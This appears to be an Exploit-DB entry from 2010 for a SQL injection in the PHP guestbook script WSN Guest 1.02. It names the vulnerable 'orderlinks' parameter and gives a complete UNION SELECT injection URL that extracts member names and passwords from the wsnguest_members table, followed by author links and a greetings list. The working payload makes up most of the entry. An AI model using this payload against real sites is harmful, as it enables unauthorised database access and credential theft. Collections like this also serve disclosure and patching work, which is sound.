WSN Guest 1.02 - 'orderlinks' SQL Injection

EDB-ID:

11436


Author:

Gamoscu

Type:

webapps


Platform:

PHP

Date:

2010-02-13


###########################
Author    : Gamoscu
Homepage  : http://www.1923turk.com
Blog      : http://gamoscu.wordpress.com/
Script    : WSN Guest 1.02
Download  : http://scripts.webmastersite.net/wsnguest/wsnguest.zip
###########################

Exploat  :index.php?page=20&orderlinks=SQL
 



http://server/wsnguest/index.php?page=20&orderlinks=+and+1=0+union+select+name,null,null,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wsnguest_members--



############################################################## 
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO 
##############################################################

Veda Turlarý :)